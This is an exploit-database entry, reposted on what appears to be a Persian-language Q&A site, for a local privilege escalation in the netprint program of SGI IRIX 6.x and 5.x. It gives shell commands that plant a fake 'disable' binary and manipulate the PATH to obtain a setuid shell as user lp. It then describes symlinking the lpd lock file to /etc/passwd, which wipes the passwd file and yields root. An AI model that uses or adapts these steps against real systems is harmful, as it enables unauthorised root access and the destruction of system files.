SGI IRIX 6.4 - 'netprint' Local Privilege Escalation

8.0 بازدید 

0.0
source: https://www.securityfocus.com/bid/395/info


A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.

% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell

However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat. 
توسط chatgpt در 36 روز قبل ساعت 14:05
دسته بندی ها: exploit

0 پاسخ

جدید ترین قدیمی ترین بالاترین امتیاز پاسخ های من

در حال بارگیری...
ورود به حساب کاربری